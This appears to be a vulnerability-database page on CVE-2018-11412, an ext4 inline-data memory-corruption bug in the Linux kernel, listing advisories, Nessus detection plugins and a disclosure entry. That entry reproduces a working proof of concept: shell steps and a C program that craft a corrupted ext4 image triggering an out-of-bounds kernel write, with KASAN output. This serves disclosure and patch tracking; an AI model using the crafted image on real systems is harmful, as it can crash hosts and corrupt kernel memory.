Vulnerabilities > CVE-2018-11412 - Use After Free vulnerability in multiple products
Attack vector
NETWORK Attack complexity
MEDIUM Privileges required
NONE Confidentiality impact
NONE Integrity impact
NONE Availability impact
PARTIAL Summary
In the Linux kernel 4.13 through 4.16.11, ext4_read_inline_data() in fs/ext4/inline.c performs a memcpy with an untrusted length value in certain circumstances involving a crafted filesystem that stores the system.data extended attribute value in a dedicated inode.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Exploit-Db
description | Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption. CVE-2018-11412. Dos exploit for Linux platform |
file | exploits/linux/dos/44832.txt |
id | EDB-ID:44832 |
last seen | 2018-06-05 |
modified | 2018-06-05 |
platform | linux |
port | |
published | 2018-06-05 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/44832/ |
title | Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption |
type | dos |
Nessus
NASL family Fedora Local Security Checks NASL id FEDORA_2018-2C6BD93875.NASL description The 4.17.2 kernel rebase contains new drivers, new features, and a number of important fixes across the tree. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2019-01-03 plugin id 120318 published 2019-01-03 reporter This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/120318 title Fedora 28 : kernel / kernel-tools (2018-2c6bd93875) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory FEDORA-2018-2c6bd93875. # include("compat.inc"); if (description) { script_id(120318); script_version("1.5"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2018-11412"); script_xref(name:"FEDORA", value:"2018-2c6bd93875"); script_name(english:"Fedora 28 : kernel / kernel-tools (2018-2c6bd93875)"); script_summary(english:"Checks rpm output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "The 4.17.2 kernel rebase contains new drivers, new features, and a number of important fixes across the tree. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bodhi.fedoraproject.org/updates/FEDORA-2018-2c6bd93875" ); script_set_attribute( attribute:"solution", value:"Update the affected kernel and / or kernel-tools packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:kernel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:kernel-tools"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:28"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/24"); script_set_attribute(attribute:"patch_publication_date", value:"2018/06/23"); script_set_attribute(attribute:"plugin_publication_date", value:"2019/01/03"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl", "linux_alt_patch_detect.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); include("ksplice.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! preg(pattern:"^28([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 28", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); if (get_one_kb_item("Host/ksplice/kernel-cves")) { rm_kb_item(name:"Host/uptrack-uname-r"); cve_list = make_list("CVE-2018-11412"); if (ksplice_cves_check(cve_list)) { audit(AUDIT_PATCH_INSTALLED, "KSplice hotfix for FEDORA-2018-2c6bd93875"); } else { __rpm_report = ksplice_reporting_text(); } } flag = 0; if (rpm_check(release:"FC28", reference:"kernel-4.17.2-200.fc28")) flag++; if (rpm_check(release:"FC28", reference:"kernel-tools-4.17.2-200.fc28")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_WARNING, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "kernel / kernel-tools"); }
NASL family Amazon Linux Local Security Checks NASL id ALA_ALAS-2018-1046.NASL description The fs/ext4/inline.c:ext4_read_inline_data() function in the Linux kernel performs a memcpy with an untrusted length value in certain circumstances involving a crafted filesystem that stores the system.data extended attribute value in a dedicated inode. The unbound copy can cause memory corruption or possible privilege escalation. (CVE-2018-11412) last seen 2020-06-01 modified 2020-06-02 plugin id 111337 published 2018-07-26 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/111337 title Amazon Linux AMI : kernel (ALAS-2018-1046) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Amazon Linux AMI Security Advisory ALAS-2018-1046. # include("compat.inc"); if (description) { script_id(111337); script_version("1.3"); script_cvs_date("Date: 2019/04/05 23:25:05"); script_cve_id("CVE-2018-11412"); script_xref(name:"ALAS", value:"2018-1046"); script_name(english:"Amazon Linux AMI : kernel (ALAS-2018-1046)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Amazon Linux AMI host is missing a security update." ); script_set_attribute( attribute:"description", value: "The fs/ext4/inline.c:ext4_read_inline_data() function in the Linux kernel performs a memcpy with an untrusted length value in certain circumstances involving a crafted filesystem that stores the system.data extended attribute value in a dedicated inode. The unbound copy can cause memory corruption or possible privilege escalation. (CVE-2018-11412)" ); script_set_attribute( attribute:"see_also", value:"https://alas.aws.amazon.com/ALAS-2018-1046.html" ); script_set_attribute( attribute:"solution", value:"Run 'yum update kernel' and reboot the instance to update your system." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:kernel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:kernel-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:kernel-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:kernel-headers"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:kernel-tools"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:kernel-tools-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:kernel-tools-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:perf"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:perf-debuginfo"); script_set_attribute(attribute:"cpe", value:"cpe:/o:amazon:linux"); script_set_attribute(attribute:"patch_publication_date", value:"2018/07/23"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/07/26"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Amazon Linux Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/AmazonLinux/release", "Host/AmazonLinux/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/AmazonLinux/release"); if (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, "Amazon Linux"); os_ver = pregmatch(pattern: "^AL(A|\d)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Amazon Linux"); os_ver = os_ver[1]; if (os_ver != "A") { if (os_ver == 'A') os_ver = 'AMI'; audit(AUDIT_OS_NOT, "Amazon Linux AMI", "Amazon Linux " + os_ver); } if (!get_kb_item("Host/AmazonLinux/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (rpm_check(release:"ALA", reference:"kernel-4.14.55-62.37.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"kernel-debuginfo-4.14.55-62.37.amzn1")) flag++; if (rpm_check(release:"ALA", cpu:"i686", reference:"kernel-debuginfo-common-i686-4.14.55-62.37.amzn1")) flag++; if (rpm_check(release:"ALA", cpu:"x86_64", reference:"kernel-debuginfo-common-x86_64-4.14.55-62.37.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"kernel-devel-4.14.55-62.37.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"kernel-headers-4.14.55-62.37.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"kernel-tools-4.14.55-62.37.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"kernel-tools-debuginfo-4.14.55-62.37.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"kernel-tools-devel-4.14.55-62.37.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"perf-4.14.55-62.37.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"perf-debuginfo-4.14.55-62.37.amzn1")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc"); }
NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-3752-2.NASL description USN-3752-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu 16.04 LTS. It was discovered that, when attempting to handle an out-of-memory situation, a NULL pointer dereference could be triggered in the Linux kernel in some circumstances. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-1000200) Wen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly validate meta-data information. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10323) Wen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly validate xattr information. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10840) Wen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881) Wen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly handle corrupted meta data in some situations. An attacker could use this to specially craft an ext4 filesystem that caused a denial of service (system crash) when mounted. (CVE-2018-1093) Jann Horn discovered that the Linux kernel last seen 2020-06-01 modified 2020-06-02 plugin id 112110 published 2018-08-24 reporter Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/112110 title Ubuntu 16.04 LTS : linux-hwe vulnerabilities (USN-3752-2) NASL family Amazon Linux Local Security Checks NASL id AL2_ALAS-2018-1046.NASL description The fs/ext4/inline.c:ext4_read_inline_data() function in the Linux kernel performs a memcpy with an untrusted length value in certain circumstances involving a crafted filesystem that stores the system.data extended attribute value in a dedicated inode. The unbound copy can cause memory corruption or possible privilege escalation.(CVE-2018-11412) last seen 2020-06-01 modified 2020-06-02 plugin id 111334 published 2018-07-26 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/111334 title Amazon Linux 2 : kernel (ALAS-2018-1046) NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-3752-3.NASL description It was discovered that, when attempting to handle an out-of-memory situation, a NULL pointer dereference could be triggered in the Linux kernel in some circumstances. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-1000200) Wen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly validate meta-data information. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10323) Wen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly validate xattr information. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10840) Wen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881) Wen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly handle corrupted meta data in some situations. An attacker could use this to specially craft an ext4 filesystem that caused a denial of service (system crash) when mounted. (CVE-2018-1093) Jann Horn discovered that the Linux kernel last seen 2020-06-01 modified 2020-06-02 plugin id 112189 published 2018-08-30 reporter Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/112189 title Ubuntu 16.04 LTS / 18.04 LTS : linux-azure, linux-oem, linux-gcp vulnerabilities (USN-3752-3) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2019-0525.NASL description An update for kernel-alt is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The kernel-alt packages provide the Linux kernel version 4.x. Security Fix(es) : * kernel: out-of-bounds memcpy in fs/ext4/inline.c:ext4_read_inline_data() with crafted ext4 image (CVE-2018-11412) * kernel: use-after-free in jbd2_journal_commit_transaction funtion (CVE-2018-10876) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bug Fix(es) : * blk-mq IO hang in null_blk test (BZ#1581223) * lpfc remove lpfc_enable_pbde module parameter. (BZ#1615875) * RHEL-Alt-7.6 - [Power9][DD2.2][4.14.0-109]package installation segfaults inside debian chroot env in P9 KVM guest with HTM enabled (kvm) (BZ# 1628817) * Pegas1.1 - [P9] last seen 2020-06-01 modified 2020-06-02 plugin id 122807 published 2019-03-13 reporter This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/122807 title RHEL 7 : kernel-alt (RHSA-2019:0525) NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-3752-1.NASL description It was discovered that, when attempting to handle an out-of-memory situation, a NULL pointer dereference could be triggered in the Linux kernel in some circumstances. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-1000200) Wen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly validate meta-data information. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10323) Wen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly validate xattr information. An attacker could use this to construct a malicious xfs image that, when mounted, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-10840) Wen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly keep meta-data information consistent in some situations. An attacker could use this to construct a malicious ext4 image that, when mounted, could cause a denial of service (system crash). (CVE-2018-10881) Wen Xu discovered that the ext4 filesystem implementation in the Linux kernel did not properly handle corrupted meta data in some situations. An attacker could use this to specially craft an ext4 filesystem that caused a denial of service (system crash) when mounted. (CVE-2018-1093) Jann Horn discovered that the Linux kernel last seen 2020-06-01 modified 2020-06-02 plugin id 112109 published 2018-08-24 reporter Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/112109 title Ubuntu 18.04 LTS : linux, linux-aws, linux-gcp, linux-kvm, linux-raspi2 vulnerabilities (USN-3752-1)
Packetstorm
data source | https://packetstormsecurity.com/files/download/148054/linkerext4-corrupt.txt |
id | PACKETSTORM:148054 |
last seen | 2018-06-06 |
published | 2018-06-05 |
reporter | Google Security Research |
source | https://packetstormsecurity.com/files/148054/Linux-Kernel-ext4_read_inline_data-Memory-Corruption.html |
title | Linux Kernel ext4_read_inline_data() Memory Corruption |
Redhat
advisories |
| ||||
rpms |
|
Seebug
bulletinFamily | exploit |
description | ext4 can store data for small regular files as "inline data", meaning that the data is stored inside the corresponding inode instead of in separate blocks. Inline data is stored in two places: The first 60 bytes go in the i_block field in the inode (which normally contains a list of blocks instead), the rest goes in the special filesystem-internal extended attribute "system.data". Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can store extended attribute values not only inline in the inode, but can also store such values in dedicated inodes. When a corrupted filesystem stores the system.data extended attribute value in a dedicated inode, the kernel gets confused, causing memory corruption. ext4_find_inline_data_nolock() attempts to locate an inode's inline data by searching for the system.data xattr using ext4_xattr_ibody_find(). If the inode has xattrs, ext4_xattr_ibody_find() first checks them for corruption using xattr_check_inode(), then grabs the wanted xattr using xattr_find_entry(). xattr_check_inode() uses ext4_xattr_check_entries() to check the individual xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr whose value is in a dedicated inode) - only for inline values, length and offset checks are performed to ensure that the value actually fits into the inode. The problem is that ext4_find_inline_data_nolock() then assumes that the returned xattr uses inline storage and that the returned length will fit into the inode; it stores the length field from the xattr in `EXT4_I(inode)->i_inline_size` without further checks. Later, when the file is read, ext4_read_inline_data() trusts this length value, causing an out-of-bounds memcpy() in the following line: ``` memcpy(buffer, (void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len); ``` To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on: 1. Create a new ext4 filesystem image, with 256-byte inodes and inline data support: ``` $ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k mke2fs 1.43.7 (16-Oct-2017) Creating regular file testfs.img Filesystem too small for a journal Creating filesystem with 100 4k blocks and 64 inodes Allocating group tables: done Writing inode tables: done Writing superblocks and filesystem accounting information: done ``` 2. Create a 75-byte file in the new filesystem: ``` $ mkdir mount $ sudo mount testfs.img mount $ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile 1+0 records in 1+0 records out 75 bytes copied, 0.000811554 s, 92.4 kB/s $ sudo umount mount ``` 3. Bump up the inode size, bump up the xattr size, and mark the xattr value as non-inline: ``` $ cat fixup.c #include <stdint.h> #include <fcntl.h> #include <err.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/stat.h> #define __le16 uint16_t #define __le32 uint32_t #define __u16 uint16_t #define __u32 uint32_t #define __u8 uint8_t /* some definitions from kernel headers */ #define EXT4_NDIR_BLOCKS 12 #define EXT4_IND_BLOCK EXT4_NDIR_BLOCKS #define EXT4_DIND_BLOCK (EXT4_IND_BLOCK + 1) #define EXT4_TIND_BLOCK (EXT4_DIND_BLOCK + 1) #define EXT4_N_BLOCKS (EXT4_TIND_BLOCK + 1) #define EXT4_XATTR_MAGIC 0xEA020000 struct ext4_inode { __le16 i_mode; __le16 i_uid; __le32 i_size_lo; __le32 i_atime; __le32 i_ctime; __le32 i_mtime; __le32 i_dtime; __le16 i_gid; __le16 i_links_count; __le32 i_blocks_lo; __le32 i_flags; union { struct { __le32 l_i_version; } linux1; } osd1; __le32 i_block[EXT4_N_BLOCKS]; __le32 i_generation; __le32 i_file_acl_lo; __le32 i_size_high; __le32 i_obso_faddr; union { struct { __le16 l_i_blocks_high; __le16 l_i_file_acl_high; __le16 l_i_uid_high; __le16 l_i_gid_high; __le16 l_i_checksum_lo; __le16 l_i_reserved; } linux2; } osd2; __le16 i_extra_isize; __le16 i_checksum_hi; __le32 i_ctime_extra; __le32 i_mtime_extra; __le32 i_atime_extra; __le32 i_crtime; __le32 i_crtime_extra; __le32 i_version_hi; __le32 i_projid; }; struct ext4_xattr_ibody_header { __le32 h_magic; }; struct ext4_xattr_entry { __u8 e_name_len; __u8 e_name_index; __le16 e_value_offs; __le32 e_value_inum; __le32 e_value_size; __le32 e_hash; char e_name[0]; }; #define INODE_SIZE 256 #define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) ) int main(int argc, char **argv) { char *path = argv[1]; int fd = open(path, O_RDWR); if (fd == -1) err(1, "open"); struct stat st; if (fstat(fd, &st)) err(1, "fstat"); char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if (map == MAP_FAILED) err(1, "mmap"); for (int i=0; i<st.st_size/INODE_SIZE; i++) { struct ext4_inode *ino = (void*)(map + i * INODE_SIZE); if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue; printf("found inode (idx=%d, size=%u, mode=%ho)\n", i, ino->i_size_lo, ino->i_mode); ino->i_size_lo = 60000; printf(" i_extra_isize = %hu\n", ino->i_extra_isize); struct ext4_xattr_ibody_header *hdr = (void*)( ((char*)ino)+128+ino->i_extra_isize ); if (hdr->h_magic != EXT4_XATTR_MAGIC) continue; struct ext4_xattr_entry *entry = (void*)(hdr+1); while (*(uint32_t*)entry != 0) { printf(" attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n", entry->e_name_index, entry->e_name_len, entry->e_name, entry->e_value_offs, entry->e_value_inum, entry->e_value_size); entry->e_value_offs = 0; entry->e_value_inum = 20; entry->e_value_size = 60000; entry = (void*)( (char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4) ); } } } $ gcc -o fixup fixup.c -Wall $ ./fixup testfs.img found inode (idx=555, size=75, mode=100644) i_extra_isize = 32 attr: idx=7 name='data' offs=76 inum=0 size=15 ``` 4. Use fsck to fix up the inode checksum (but don't let it fix anything else!): ``` $ fsck.ext4 -f testfs.img e2fsck 1.43.7 (16-Oct-2017) Pass 1: Checking inodes, blocks, and sizes Inode 12 has INLINE_DATA_FL flag but extended attribute not found. Truncate<y>? no Extended attribute in inode 12 has a value size (60000) which is invalid Clear<y>? no Inode 12 passes checks, but checksum does not match inode. Fix<y>? yes Pass 2: Checking directory structure Pass 3: Checking directory connectivity Pass 4: Checking reference counts Pass 5: Checking group summary information testfs.img: ***** FILE SYSTEM WAS MODIFIED ***** testfs.img: ********** WARNING: Filesystem still has errors ********** testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks ``` 5. Mount the filesystem again: ``` $ sudo mount testfs.img mount ``` 6. Read the file: ``` $ hexdump -C mount/testfile 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000030 00 00 00 00 00 00 00 00 00 00 00 00 04 07 00 00 |................| 00000040 14 00 00 00 60 ea 00 00 00 00 00 00 64 61 74 61 |....`.......data| 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000004a0 31 00 00 00 00 00 00 00 e0 d1 fc 98 d7 7f 00 00 |1...............| 000004b0 e0 07 03 99 d7 7f 00 00 00 00 00 00 00 00 00 00 |................| 000004c0 00 00 00 00 00 00 00 00 e0 5f 00 00 00 00 00 00 |........._......| 000004d0 64 00 00 00 00 00 00 00 f0 af 02 99 d7 7f 00 00 |d...............| 000004e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| [...] ``` 7. Check dmesg: ``` $ dmesg [...] [ 3211.552729] ================================================================== [ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922 [ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7 [ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016 [ 3211.552799] Call Trace: [ 3211.552807] dump_stack+0x71/0xab [ 3211.552813] print_address_description+0x6a/0x250 [ 3211.552817] kasan_report+0x258/0x380 [ 3211.552863] ? ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552867] memcpy+0x34/0x50 [ 3211.552914] ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552961] ext4_read_inline_page+0x1e4/0x2a0 [ext4] [ 3211.553006] ? ext4_read_inline_data+0x120/0x120 [ext4] [ 3211.553053] ext4_readpage_inline+0x13e/0x160 [ext4] [ 3211.553101] ext4_readpage+0xf5/0x110 [ext4] [ 3211.553106] generic_file_read_iter+0x9a4/0xea0 [ 3211.553112] ? filemap_range_has_page+0x160/0x160 [ 3211.553116] ? save_stack+0x89/0xb0 [ 3211.553120] ? __kasan_slab_free+0x105/0x150 [ 3211.553124] ? aa_path_link+0x1f0/0x1f0 [ 3211.553128] ? do_syscall_64+0x150/0x160 [ 3211.553132] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 3211.553137] ? audit_watch_compare+0x1b/0x50 [ 3211.553142] __vfs_read+0x239/0x340 [ 3211.553145] ? __x64_sys_copy_file_range+0x2d0/0x2d0 [ 3211.553149] ? dput.part.19+0x2e/0x1b0 [ 3211.553154] ? auditd_test_task+0x43/0x60 [ 3211.553158] vfs_read+0xa5/0x190 [ 3211.553162] ksys_read+0xa1/0x120 [ 3211.553166] ? kernel_write+0xa0/0xa0 [ 3211.553171] do_syscall_64+0x6d/0x160 [ 3211.553175] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 3211.553178] RIP: 0033:0x7f9ada1af72c [ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000 [...] [ 3211.553197] The buggy address belongs to the page: [ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0 [ 3211.553207] flags: 0x17fffc000000021(locked|lru) [ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff [ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0 [ 3211.553222] page dumped because: kasan: bad access detected [ 3211.553224] page->mem_cgroup:ffff8803cf31cac0 [ 3211.553229] Memory state around the buggy address: [ 3211.553234] ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 3211.553238] ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553246] ^ [ 3211.553250] ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553254] ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553257] ================================================================== ``` Occasionally this will also cause unrelated userspace processes to segfault. |
id | SSV:97329 |
last seen | 2018-06-08 |
modified | 2018-06-08 |
published | 2018-06-08 |
reporter | Knownsec |
title | Linux ext4: out-of-bounds memcpy via non-inline system.data xattr(CVE-2018-11412) |
References
- http://www.securityfocus.com/bid/104291
- https://access.redhat.com/errata/RHSA-2019:0525
- https://bugs.chromium.org/p/project-zero/issues/detail?id=1580
- https://bugzilla.kernel.org/show_bug.cgi?id=199803
- https://usn.ubuntu.com/3752-1/
- https://usn.ubuntu.com/3752-2/
- https://usn.ubuntu.com/3752-3/
- https://www.exploit-db.com/exploits/44832/